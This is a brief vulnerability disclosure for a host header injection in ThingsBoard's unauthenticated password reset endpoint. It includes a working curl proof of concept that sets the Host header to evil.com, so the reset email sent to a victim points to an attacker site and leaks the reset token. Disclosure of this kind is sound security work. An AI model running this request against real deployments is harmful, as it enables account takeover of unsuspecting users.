This vulnerability allows an attacker to inject host header which is used to generate password reset links among other things.
PoC:
curl 'https://thingsboard_host/api/noauth/resetPasswordByEmail' -H 'Host: evil.com' -H 'Connection: keep-alive' -H 'Accept: application/json, text/plain, */*' -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/json' -H 'Origin: https://thingsboard_host' -H 'Sec-Fetch-Site: same-origin' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Dest: empty' -H 'Referer: https://thingsboard_host/login/resetPasswordRequest' -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' --data-binary '{"email":"victim@example"}' --compressed
This will send an email to victim which points to https://evil.com instead of actual Thingsboard url. This allows an attacker to trick users into submitting their password reset tokens and new passwords to malicious websites linked from genuine Thingsboard mails.